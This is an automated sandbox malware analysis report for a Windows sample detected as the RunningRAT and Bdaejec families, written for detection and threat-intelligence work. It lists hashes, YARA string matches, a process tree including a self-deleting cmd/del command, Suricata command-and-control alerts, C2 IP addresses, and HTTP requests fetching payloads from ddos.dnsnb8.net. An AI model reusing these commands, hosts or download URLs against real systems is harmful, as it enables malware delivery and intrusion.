Windows Analysis Report
gE4NVCZDRk.exe

Overview

General Information

Sample name: gE4NVCZDRk.exe (renamed because original name is a hash value)
Original sample name: 02b3757b29002a8fcabd9afaebf1f7d3.exe
Analysis ID: 1544387
MD5: 02b3757b29002a8fcabd9afaebf1f7d3
SHA1: cecffd787a418e435a9019211dda54444c2184fd
SHA256: e909609bcd7d6a217635b372abba6e55d034d2e55712b032844ce28ded020064
Tags: 32, exe, Worm, Ramnit

Detection

Bdaejec, RunningRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Bdaejec
Yara detected RunningRAT
AI detected suspicious sample
Checks if browser processes are running
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Self deletion via cmd or bat file
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • gE4NVCZDRk.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\gE4NVCZDRk.exe" MD5: 02B3757B29002A8FCABD9AFAEBF1F7D3)
    • XekSuT.exe (PID: 6180 cmdline: C:\Users\user\AppData\Local\Temp\XekSuT.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 5696 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6180 -s 1456 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • cmd.exe (PID: 2476 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 2844 cmdline: ping 127.0.0.1 -n 1 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • svchost.exe (PID: 5676 cmdline: C:\Windows\SysWOW64\svchost.exe -k "SySyeu" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • svchost.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\svchost.exe -k "SySyeu" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
    • SySyeu.exe (PID: 3260 cmdline: C:\Windows\system32\SySyeu.exe "c:\users\user\appdata\local\temp\6011859.dll",MainThread MD5: 889B99C52A60DD49227C5E485A016679)
  • svchost.exe (PID: 2412 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 4888 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6180 -ip 6180 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WMIADAP.exe (PID: 6180 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
  • cleanup
Name: Running RAT
Description: NJCCIC characterizes RunningRAT as a remote access trojan (RAT) that operates using two DLL files. When the trojan is loaded onto a system, it executes the first DLL. This is used to disable anti-malware solutions, unpack and execute the main RAT DLL, and gain persistence. The trojan installs a Windows batch file dx.bat that attempts to kill the daumcleaner.exe task, a Korean security program. The file then attempts to remove itself. Once the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server to change the address the trojan communicates with. The second DLL gathers information about the victim's system, including its operating system and driver and processor information. The RAT can log user keystrokes, copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and more. The second DLL also uses several anti-bugging techniques.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat
No configs have been found
Source: gE4NVCZDRk.exe | Rule: JoeSecurity_RunningRAT | Description: Yara detected RunningRAT | Author: Joe Security
Source: gE4NVCZDRk.exe | Rule: GoldDragon_RunningRAT | Description: Detects Running RAT from Gold Dragon report | Author: Florian Roth
  • 0x402f:$a1: emanybtsohteg
  • 0x405d:$a2: tekcosesolc
  • 0x4089:$a3: emankcosteg
  • 0x4095:$a4: emantsohteg
  • 0x406a:$a5: tpokcostes
  • 0x400e:$a6: putratSASW
Source: gE4NVCZDRk.exe | Rule: MALWARE_Win_RunningRAT | Description: Detects RunningRAT | Author: ditekSHen
  • 0x9bb0:$s1: %s%d.dll
  • 0x9cbc:$s2: /c ping 127.0.0.1 -n
  • 0x9cd6:$s3: del /f/q "%s"
  • 0x9ac8:$s4: GUpdate
  • 0x9c8c:$s5: %s\%d.bak
  • 0x9bc5:$s6: "%s",MainThread
  • 0x9bd8:$s7: rundll32.exe
  • 0x4089:$rev1: emankcosteg
  • 0x42ae:$rev3: daerhTniaM,"s%" s%
  • 0x4602:$rev4: s% etadpUllD,"s%" 23lldnuR
  • 0x472f:$rev5: ---DNE yromeMmorFdaoL
  • 0x4724:$rev6: eMnigulP
  • 0x429f:$rev7: exe.23lldnuR\
  • 0x45a8:$rev8: dnammoc\nepo\llehs\
  • 0x45df:$rev8: dnammoc\nepo\llehs\
  • 0x4789:$rev9: "s%" k- exe.tsohcvs\23metsyS\%%tooRmetsyS%
  • 0x402f:$rev10: emanybtsohteg
  • 0x405d:$rev11: tekcosesolc
  • 0x406a:$rev12: tpokcostes
  • 0x4095:$rev13: emantsohteg

Source: C:\Users\user\AppData\Local\Temp\6011859.dll | Rule: MALWARE_Win_RunningRAT | Description: Detects RunningRAT | Author: ditekSHen
  • 0x5534:$s4: GUpdate
  • 0x514c:$s5: %s\%d.bak
  • 0x55e3:$s6: "%s",MainThread
  • 0x50ec:$v2_1: %%SystemRoot%%\System32\svchost.exe -k "%s"
  • 0x515c:$v2_2: LoadFromMemory END---
  • 0x51d0:$v2_3: hmProxy!= NULL
  • 0x5284:$v2_4: Rundll32 "%s",DllUpdate %s
  • 0x5610:$v2_6: %d*%sMHz

Source: 00000000.00000000.1680620714.0000000000403000.00000008.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_RunningRAT | Description: Yara detected RunningRAT | Author: Joe Security
Source: Process Memory Space: gE4NVCZDRk.exe PID: 7112 | Rule: JoeSecurity_RunningRAT | Description: Yara detected RunningRAT | Author: Joe Security
Source: Process Memory Space: XekSuT.exe PID: 6180 | Rule: JoeSecurity_Bdaejec | Description: Yara detected Bdaejec | Author: Joe Security

Source: 3.2.svchost.exe.10000000.0.unpack | Rule: MALWARE_Win_RunningRAT | Description: Detects RunningRAT | Author: ditekSHen
  • 0x5534:$s4: GUpdate
  • 0x514c:$s5: %s\%d.bak
  • 0x55e3:$s6: "%s",MainThread
  • 0x50ec:$v2_1: %%SystemRoot%%\System32\svchost.exe -k "%s"
  • 0x515c:$v2_2: LoadFromMemory END---
  • 0x51d0:$v2_3: hmProxy!= NULL
  • 0x5284:$v2_4: Rundll32 "%s",DllUpdate %s
  • 0x5610:$v2_6: %d*%sMHz
Source: 0.2.gE4NVCZDRk.exe.4032a0.1.raw.unpack | Rule: MALWARE_Win_RunningRAT | Description: Detects RunningRAT | Author: ditekSHen
  • 0x6910:$s1: %s%d.dll
  • 0x6a1c:$s2: /c ping 127.0.0.1 -n
  • 0x6a36:$s3: del /f/q "%s"
  • 0x5534:$s4: GUpdate
  • 0x6828:$s4: GUpdate
  • 0x514c:$s5: %s\%d.bak
  • 0x69ec:$s5: %s\%d.bak
  • 0x55e3:$s6: "%s",MainThread
  • 0x6925:$s6: "%s",MainThread
  • 0x6938:$s7: rundll32.exe
  • 0x50ec:$v2_1: %%SystemRoot%%\System32\svchost.exe -k "%s"
  • 0x515c:$v2_2: LoadFromMemory END---
  • 0x51d0:$v2_3: hmProxy!= NULL
  • 0x5284:$v2_4: Rundll32 "%s",DllUpdate %s
  • 0x5610:$v2_6: %d*%sMHz
Source: 0.0.gE4NVCZDRk.exe.400000.0.unpack | Rule: JoeSecurity_RunningRAT | Description: Yara detected RunningRAT | Author: Joe Security
Source: 0.0.gE4NVCZDRk.exe.400000.0.unpack | Rule: GoldDragon_RunningRAT | Description: Detects Running RAT from Gold Dragon report | Author: Florian Roth
  • 0x402f:$a1: emanybtsohteg
  • 0x405d:$a2: tekcosesolc
  • 0x4089:$a3: emankcosteg
  • 0x4095:$a4: emantsohteg
  • 0x406a:$a5: tpokcostes
  • 0x400e:$a6: putratSASW
Source: 0.0.gE4NVCZDRk.exe.400000.0.unpack | Rule: MALWARE_Win_RunningRAT | Description: Detects RunningRAT | Author: ditekSHen
  • 0x9bb0:$s1: %s%d.dll
  • 0x9cbc:$s2: /c ping 127.0.0.1 -n
  • 0x9cd6:$s3: del /f/q "%s"
  • 0x9ac8:$s4: GUpdate
  • 0x9c8c:$s5: %s\%d.bak
  • 0x9bc5:$s6: "%s",MainThread
  • 0x9bd8:$s7: rundll32.exe
  • 0x4089:$rev1: emankcosteg
  • 0x42ae:$rev3: daerhTniaM,"s%" s%
  • 0x4602:$rev4: s% etadpUllD,"s%" 23lldnuR
  • 0x472f:$rev5: ---DNE yromeMmorFdaoL
  • 0x4724:$rev6: eMnigulP
  • 0x429f:$rev7: exe.23lldnuR\
  • 0x45a8:$rev8: dnammoc\nepo\llehs\
  • 0x45df:$rev8: dnammoc\nepo\llehs\
  • 0x4789:$rev9: "s%" k- exe.tsohcvs\23metsyS\%%tooRmetsyS%
  • 0x402f:$rev10: emanybtsohteg
  • 0x405d:$rev11: tekcosesolc
  • 0x406a:$rev12: tpokcostes
  • 0x4095:$rev13: emantsohteg

System Summary

Source: Process started | Author: vburov | Data: Command: C:\Windows\SysWOW64\svchost.exe -k "SySyeu", CommandLine: C:\Windows\SysWOW64\svchost.exe -k "SySyeu", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe -k "SySyeu", ProcessId: 5676, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T10:58:59.583625+0100 | 2807908 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 44.221.84.105 | 799 | TCP
2024-10-29T10:59:00.276781+0100 | 2807908 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 44.221.84.105 | 799 | TCP
2024-10-29T10:59:00.976850+0100 | 2807908 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 44.221.84.105 | 799 | TCP
2024-10-29T10:59:01.671009+0100 | 2807908 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 44.221.84.105 | 799 | TCP
2024-10-29T10:59:02.288886+0100 | 2807908 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 44.221.84.105 | 799 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T10:58:58.815691+0100 | 2838522 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 55716 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T10:58:58.815691+0100 | 2814897 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 119.91.152.151 | 8321 | TCP
2024-10-29T10:59:11.785152+0100 | 2814897 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 119.91.152.151 | 8321 | TCP

AV Detection

Source: gE4NVCZDRk.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Users\user\AppData\Local\Temp\6011859.dll | Avira: detection malicious, Label: BDS/Backdoor.Gen7
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\6011859.dll | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | ReversingLabs: Detection: 97%
Source: gE4NVCZDRk.exe | ReversingLabs: Detection: 97%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6011859.dll | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Joe Sandbox ML: detected
Source: gE4NVCZDRk.exe | Joe Sandbox ML: detected
Source: gE4NVCZDRk.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb | source: SciTE.exe.1.dr
Source: Binary string: rundll32.pdb | source: svchost.exe, 00000003.00000003.1684739802.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, SySyeu.exe, SySyeu.exe, 00000007.00000000.1726094464.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, SySyeu.exe.3.dr
Source: Binary string: rundll32.pdbGCTL | source: svchost.exe, 00000003.00000003.1684739802.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, SySyeu.exe, 00000007.00000000.1726094464.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, SySyeu.exe.3.dr

Spreading

Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Code function: 1_2_003C29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_003C29E2
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Code function: 1_2_003C2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_003C2B8C
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Networking

Source: Network traffic | Suricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.4:55716 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2814897 - Severity 1 - ETPRO MALWARE W32.YoungLotus Checkin : 192.168.2.4:49735 -> 119.91.152.151:8321
Source: Network traffic | Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49733 -> 44.221.84.105:799
Source: Network traffic | Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49731 -> 44.221.84.105:799
Source: Network traffic | Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49730 -> 44.221.84.105:799
Source: Network traffic | Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49732 -> 44.221.84.105:799
Source: Network traffic | Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49734 -> 44.221.84.105:799
Source: Network traffic | Suricata IDS: 2814897 - Severity 1 - ETPRO MALWARE W32.YoungLotus Checkin : 192.168.2.4:49743 -> 119.91.152.151:8321
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 799
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 799
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 799
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 799
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799
Source: global traffic | TCP traffic: 192.168.2.4:49735 -> 119.91.152.151:8321
Source: Joe Sandbox View | IP Address: 119.91.152.151
Source: Joe Sandbox View | IP Address: 44.221.84.105
Source: Joe Sandbox View | ASN Name: CNNIC-QCN-APQingdaoCableTVNetworkCenterCN
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
Source: global traffic | HTTP traffic detected:
  GET /cj//k1.rar HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ddos.dnsnb8.net:799
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /cj//k2.rar HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ddos.dnsnb8.net:799
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /cj//k3.rar HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ddos.dnsnb8.net:799
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /cj//k4.rar HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ddos.dnsnb8.net:799
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /cj//k5.rar HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ddos.dnsnb8.net:799
  Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 119.91.152.151 (12 connections)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Code function: 1_2_003C1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,1_2_003C1099
Source: global traffic | HTTP traffic detected:
  GET /cj//k1.rar HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ddos.dnsnb8.net:799
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /cj//k2.rar HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ddos.dnsnb8.net:799
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /cj//k3.rar HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ddos.dnsnb8.net:799
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /cj//k4.rar HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ddos.dnsnb8.net:799
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /cj//k5.rar HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: ddos.dnsnb8.net:799
  Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: XekSuT.exe, 00000001.00000003.1681276523.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, XekSuT.exe, 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: XekSuT.exe, 00000001.00000002.1891528876.000000000155C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net/
Source: XekSuT.exe, 00000001.00000002.1891528876.000000000155C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net/=
Source: XekSuT.exe, 00000001.00000002.1891528876.000000000155C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net/e
Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmp, XekSuT.exe, 00000001.00000002.1891528876.000000000153E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: XekSuT.exe, 00000001.00000002.1891528876.000000000153E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarmOg
Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarA
Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar?
Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarr
Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar-
Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar=1
Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarC
Source: Amcache.hve.1.dr | String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr | String found in binary or memory: http://www.spaceblue.comMathias
Source: XekSuT.exe, 00000001.00000002.1891528876.00000000015AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: SciTE.exe.1.dr | String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr | String found in binary or memory: https://www.smartsharesystems.com/Morten
Source: SciTE.exe.1.dr | Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_8fc02c2f-d

E-Banking Fraud

Source: C:\Windows\SysWOW64\svchost.exe | Code function: strlen,memset,lstrlenA,strstr,lstrcpyA,CreateProcessA, Applications\iexplore.exe\shell\open\command | 3_2_10002BC3

System Summary

            Source: gE4NVCZDRk.exe, type: SAMPLE | Matched rule: Detects Running RAT from Gold Dragon report | Author: Florian Roth
            Source: gE4NVCZDRk.exe, type: SAMPLE | Matched rule: Detects RunningRAT | Author: ditekSHen
            Source: 3.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RunningRAT | Author: ditekSHen
